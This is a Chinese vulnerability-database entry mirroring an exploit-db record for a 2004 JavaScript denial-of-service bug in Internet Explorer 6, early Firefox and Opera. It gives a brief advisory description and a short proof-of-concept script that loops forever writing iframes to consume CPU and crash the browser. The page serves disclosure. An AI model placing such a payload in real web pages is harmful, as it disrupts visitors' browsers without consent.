Microsoft Internet Explorer 6.0 / Firefox 0.8/0.9.x - JavaScript Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054569 漏洞类型
发布时间 2004-08-23 更新时间 2004-08-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24395
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10998/info

Web browsers from various vendors are reported prone to a JavaScript denial-of-service vulnerability.

The specified JavaScript code will consume 100% of the CPU resources of the affected computer, crashing the browser.

Mozilla Firefox, Microsoft Internet Explorer, and Opera are all reportedly affected by this vulnerability.

<scr1pt language="JavaScript">
while(true)
{
document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>